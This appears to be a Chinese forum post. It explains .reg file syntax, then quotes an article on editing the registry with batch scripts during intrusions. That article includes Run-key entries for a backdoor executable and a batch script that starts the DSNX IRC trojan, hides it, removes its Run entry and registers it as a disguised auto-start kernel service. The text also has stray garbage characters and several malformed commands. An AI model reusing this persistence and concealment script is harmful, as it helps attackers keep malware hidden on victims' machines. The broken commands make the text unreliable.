REGEDIT4
[路徑] (注意用大小寫)
“鍵名”=“鍵值” (針對字符串型鍵值)
“鍵名”=hex:鍵值 (針對二進制型鍵值)
“鍵名”=dWord:鍵值 (針對DWORD鍵值)
以上是注冊表文件標準文件格式�,其中小括號內是注釋�,其他包括方括號、引號���、等號、分號都是必須有的��。在編輯時要注意,不要漏掉什么����!否則不好使可別說我沒告訴你! *-*
為了能方便初學者學習��,我在給出一個具體的例子:
REGEDIT4
[HKEY_CURRENT_CONFIG//Display//Fonts]
"二進制"=hex:21,00
"dword"=dword:00000001
"字符串"="任意串值"
如果還有些問題不懂�,建議你先去導出一個,用記事本打開�,再把你自己寫的打開。兩個進行比較����,看看空格、標點��、大小寫���、有沒有出入����?(一定要一模一樣���,他要求很嚴格的)比較完之后再試一下�����。是不是好使了�??����? :)
還有一個問題值得注意。
就是當你用記事本編輯玩保存時存的是tao.reg(假設文件名是tao)文件�。但是你用的是記事本,當你保存時自動加上.txt的擴展名。這樣的話�����,雖然你看到的是tao.reg����,但實際上,他真正的全名為tao.reg.txt�����。也就是說你生成的不是注冊表文件,而是個文本文件�����。當然導不進注冊表了�����,更談不上起作用了���。
改正方法:
先在打開的文件夾中選中“查看”菜單�,打開“文件夾選項”�,選擇“查看”標簽。下面有一項是“隱藏以知文件類型的擴展名”�����,取消前面的鉤�����,這之后�,你在給你的文件重命名。這回就是真正的注冊表文件了����。
知道了這些,你應該是完全可以自己動手些注冊表文件了。只要知道鍵值�、含義。你就放心大膽的改吧����!相信你一定會成功的!
2000/XP/2003的注冊表文件只要將第一行
的REGEDIT4改為Windows Registry Editor Version 5.00即可
2.
首先你得明白什么樣的文件可以導入注冊表
一般情況下第一行是
REGEDIT4
或是
Windows Registry Editor Version 5.00
第二行空掉
以下開始方括號中些下注冊表路徑
下行寫鍵和鍵值
句提的我引一篇文章給你看
當初我也是這樣學習的
你提到刪除自己
這樣的話可以使用語句
del %0
就好了
文章在下邊�,流傳相當廣的:
如何用批處理文件來操作注冊表
在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的����,例如:為了達到隱藏后門、木馬程序而刪除Run下殘余的鍵值�。或者創建一個服務用以加載后門����。當然我們也會修改注冊表來加固系統或者改變系統的某個屬性,這些都需要我們對注冊表操作有一定的了解��。下面我們就先學習一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件)
關于注冊表的操作�,常見的是創建、修改��、刪除����。
1.創建
創建分為兩種���,一種是創建子項(Subkey)
我們創建一個文件,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
然后執行該腳本����,你就已經在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下創建了一個名字為“hacker”的子項����。
另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式,和你從注冊表中導出的文件格式一致��,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader�、door、about這三個項目
Invader的類型是“String Value”
door的類型是“REG SZ Value”
Autodos的類型是“DWORD Value”
2.修改
修改相對來說比較簡單�����,只要把你需要修改的項目導出�,然后用記事本進行修改,然后導入(regedit /s)即可�。
3.刪除
我們首先來說說刪除一個項目名稱,我們創建一個如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
執行該腳本�,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下的"Ex4rch"就被刪除了���;
我們再看看刪除一個子項,我們創建一個如下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
執行該腳本�,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已經被刪除了。
相信看到這里��,.reg文件你基本已經掌握了���。那么現在的目標就是用批處理來創建特定內容的.reg文件了�����,記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件��。
samlpe1:如上面的那個例子,如想生成如下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce�����、Runservices����、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊表中的啟動項�,用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,并config為自啟動]
@REM 這樣不是更安全^_^.
